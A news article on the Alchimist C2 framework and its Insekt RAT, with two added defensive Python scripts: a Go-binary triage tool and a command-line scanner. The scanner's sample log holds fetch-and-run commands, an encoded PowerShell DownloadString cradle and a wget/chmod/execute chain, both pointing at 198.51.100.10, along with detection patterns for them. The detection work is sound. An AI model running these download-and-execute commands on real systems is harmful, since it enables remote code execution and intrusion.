A new Chinese malware attack sows chaos: it affects Windows, Mac and Linux


Cybersecurity researchers at Cisco Talos have discovered new malware including a command and control (C2) tool called ‘Alchimist’, which appears to be actively used in attacks targeting Windows, Linux, and macOS systems.

This malware and all of its components are 64-bit executables written in Go (GoLang), a language that makes it much easier to build the same code for different operating systems, which widens the pool of computers that can potentially be infected.
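Because every component is a 64-bit Go build, a first triage step on a suspicious file is to read its header and look for the strings the Go toolchain leaves behind. The following script is an added example written for this article, not tooling from Cisco Talos or from the Alchimist/Insekt samples; it recognises ELF, PE and Mach-O headers (including fat Mach-O, whose magic it shares with Java class files), reports whether the file is 64-bit, and checks for Go markers and a `go1.x` version string. The sample headers at the bottom are constructed test data, and the marker list assumes an ordinary, non-obfuscated Go build.

```python
import re
import struct
from typing import NamedTuple, Optional

# Strings the Go toolchain leaves in the binaries it produces. Assumption: the
# sample is an ordinary Go build; a deliberately obfuscated one may strip them.
GO_MARKERS = (b"Go build ID:", b"go.buildid", b"runtime.main", b"runtime.gopanic")
GO_VERSION = re.compile(rb"go1\.\d+(?:\.\d+)?")


class BinaryInfo(NamedTuple):
    fmt: Optional[str]        # "ELF", "PE", "Mach-O", or None if not recognised
    is_64bit: bool
    looks_like_go: bool
    go_version: Optional[str]


def classify(blob: bytes) -> BinaryInfo:
    """Identify the executable format, word size and Go toolchain traces."""
    fmt, is64 = None, False
    if blob[:4] == b"\x7fELF":
        fmt = "ELF"
        is64 = len(blob) > 4 and blob[4] == 2                   # EI_CLASS == ELFCLASS64
    elif blob[:2] == b"MZ" and len(blob) >= 0x40:
        pe_off = struct.unpack_from("<I", blob, 0x3C)[0]        # e_lfanew
        if blob[pe_off:pe_off + 4] == b"PE\0\0":
            fmt = "PE"
            machine = struct.unpack_from("<H", blob, pe_off + 4)[0]
            is64 = machine in (0x8664, 0xAA64)                  # AMD64, ARM64
    elif blob[:4] in (b"\xcf\xfa\xed\xfe", b"\xfe\xed\xfa\xcf"):
        fmt, is64 = "Mach-O", True                               # MH_MAGIC_64
    elif blob[:4] in (b"\xce\xfa\xed\xfe", b"\xfe\xed\xfa\xce"):
        fmt, is64 = "Mach-O", False                              # MH_MAGIC (32-bit)
    elif blob[:4] == b"\xca\xfe\xba\xbe" and len(blob) >= 8:
        # FAT_MAGIC (big-endian). Java class files share this magic, so a
        # production tool would validate the fat_arch table before trusting it.
        fmt = "Mach-O"
        n_arch = struct.unpack_from(">I", blob, 4)[0]
        for i in range(n_arch):
            if len(blob) < 12 + 20 * i:                          # truncated table
                break
            cputype = struct.unpack_from(">I", blob, 8 + 20 * i)[0]
            if cputype & 0x01000000:                             # CPU_ARCH_ABI64
                is64 = True
    looks_like_go = any(m in blob for m in GO_MARKERS)
    m = GO_VERSION.search(blob)
    return BinaryInfo(fmt, is64, looks_like_go, m.group(0).decode() if m else None)


def _constructed_samples() -> dict:
    """Tiny hand-built headers (constructed test data, not real malware)."""
    elf_go = b"\x7fELF\x02\x01\x01" + b"\0" * 9 + b'Go build ID: "constructed"\x00runtime.main\x00go1.18.5\x00'
    elf_c = b"\x7fELF\x02\x01\x01" + b"\0" * 9 + b"GCC: (GNU) 12.2.0\x00"
    pe = bytearray(0x40)
    pe[:2] = b"MZ"
    struct.pack_into("<I", pe, 0x3C, 0x40)                       # PE header right after the DOS stub
    pe += b"PE\0\0" + struct.pack("<H", 0x8664) + b"\0" * 18     # IMAGE_FILE_MACHINE_AMD64
    pe += b'\xff Go build ID: "constructed"\n \xff'
    macho_go = b"\xcf\xfa\xed\xfe" + b"\x07\x00\x00\x01" + b"\0" * 24 + b"runtime.gopanic\x00go1.19.2\x00"
    return {"elf_go": elf_go, "elf_c": elf_c, "pe_go": bytes(pe), "macho_go": macho_go}


def triage_samples() -> dict:
    """Classify every constructed sample; keyed by sample name."""
    return {name: classify(blob) for name, blob in _constructed_samples().items()}


if __name__ == "__main__":
    for name, info in triage_samples().items():
        print(f"{name:10s} {info}")
```

On a real file, pass `open(path, "rb").read()` to `classify`; a hit on the Go markers is a hint to continue with a proper Go-aware disassembler rather than proof of anything on its own.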

This is how ‘Alchimist’ infects you

The Alchimist C2 has a web interface written in Simplified Chinese and can generate a configured payload, establish remote sessions, deploy the payload to remote machines, capture screenshots, remotely execute shellcode and run arbitrary commands, Cisco explains in its report on the malware.

The framework supports the creation of custom infection mechanisms to deliver the ‘Insekt’ Remote Access Trojan (RAT) to devices and assists hackers by generating PowerShell (for Windows) and wget (for Linux) code snippets for deployment of the RAT.

The Insekt payload can be configured in the Alchimist interface using various parameters such as C2 IP/URL, platform (Windows or Linux), and communication protocol (TLS, SNI, WSS/WS). Insekt doesn’t work on macOS yet, so Alchimist fills this gap with a Mach-O file, a 64-bit executable written in GoLang that contains an exploit.
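Since the framework hands operators PowerShell and wget one-liners for deployment, process-creation telemetry is the natural place to catch the RAT landing. The scanner below is an added example written for this article, not code from Cisco Talos or from the framework itself; it assumes the analyst has full command lines (for instance from Sysmon event 1 or auditd), decodes PowerShell `-EncodedCommand` arguments (base64 of UTF-16LE) before matching, and flags a Linux fetch/chmod/execute chain only when all three parts appear in one command. The log lines are constructed samples using the documentation address 198.51.100.10.

```python
import base64
import re
from dataclasses import dataclass, field
from typing import List

# PowerShell launch flags and download-cradle verbs commonly seen together.
PS_FLAGS = re.compile(
    r"-(?:nop|noprofile|noni|w(?:indowstyle)?\s+hidden|ep\s+bypass|executionpolicy\s+bypass)\b", re.I)
PS_CRADLE = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient|Invoke-Expression|\biex\b", re.I)
PS_ENCODED = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)

# Linux side: a fetch, a chmod that adds execute, and an execution from a
# world-writable path, chained in a single command line.
SH_FETCH = re.compile(r"\b(?:wget|curl)\b[^;&|]*https?://", re.I)
SH_CHMOD = re.compile(r"\bchmod\s+(?:\+x|[0-7]{3,4})")
SH_EXEC = re.compile(r"(?:;|&&|\|\|)\s*(?:\./|/tmp/|/dev/shm/|/var/tmp/)\S+")


@dataclass
class Finding:
    line_no: int
    rule: str
    evidence: List[str] = field(default_factory=list)


def decode_encoded_command(cmdline: str) -> str:
    """Return the decoded -EncodedCommand text (UTF-16LE base64), or '' if absent/invalid."""
    m = PS_ENCODED.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le", "replace")
    except ValueError:            # binascii.Error is a ValueError subclass
        return ""


def scan_command_line(line_no: int, cmdline: str) -> List[Finding]:
    findings: List[Finding] = []
    lowered = cmdline.lower()
    if "powershell" in lowered or "pwsh" in lowered:
        # Match against the visible command line plus anything hidden in -enc.
        text = cmdline + " " + decode_encoded_command(cmdline)
        cradle = PS_CRADLE.findall(text)
        if cradle:
            findings.append(Finding(line_no, "powershell_download_cradle",
                                    cradle + PS_FLAGS.findall(text)))
    fetch = SH_FETCH.search(cmdline)
    if fetch and SH_CHMOD.search(cmdline) and SH_EXEC.search(cmdline):
        findings.append(Finding(line_no, "shell_fetch_chmod_execute", [fetch.group(0)]))
    return findings


def scan_log(lines) -> List[Finding]:
    out: List[Finding] = []
    for n, line in enumerate(lines, 1):
        out.extend(scan_command_line(n, line))
    return out


# Constructed sample telemetry: two benign admin commands, one encoded cradle,
# one benign download, one fetch/chmod/execute chain.
ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.10/s')".encode("utf-16le")).decode()
SAMPLE_LOG = [
    'powershell.exe -NoProfile -Command "Get-Process | Sort-Object CPU"',
    "powershell.exe -nop -w hidden -enc " + ENCODED,
    "wget https://example.com/file.tar.gz -O /tmp/file.tar.gz",
    "wget http://198.51.100.10/stage -O /tmp/.s && chmod +x /tmp/.s && /tmp/.s",
    "curl -s https://example.com/api | jq .",
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f.line_no}: {f.rule}  evidence={f.evidence}")
```

The decoding step matters more than the regexes: an encoded command line shows none of the cradle verbs in the raw event, so rules that only inspect the visible string miss it entirely. Tune the path list in `SH_EXEC` and the flag list in `PS_FLAGS` to your environment to keep false positives down.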

Manjusaka’s successor?

The discovery of Alchimist and its assorted family of malware implants comes three months after Talos also detailed another malware known as Manjusaka, which itself was billed as the “Chinese brother of Sliver and Cobalt Strike.”

Both Manjusaka and Alchimist have similar functionality, despite differences in implementation when it comes to web interfaces. Alchimist is another attack framework available to cybercriminals who do not have the knowledge or ability to build all the necessary components for more sophisticated cyberattacks.

Unfortunately, these frameworks work out of the box and are high quality, feature rich, good at evading detection by antivirus and other security solutions, and effective at implanting themselves on targets. They are also attractive to more advanced threat actors who want to minimize their operational expenses and blend in with the random malicious traffic of other hackers to evade attribution.
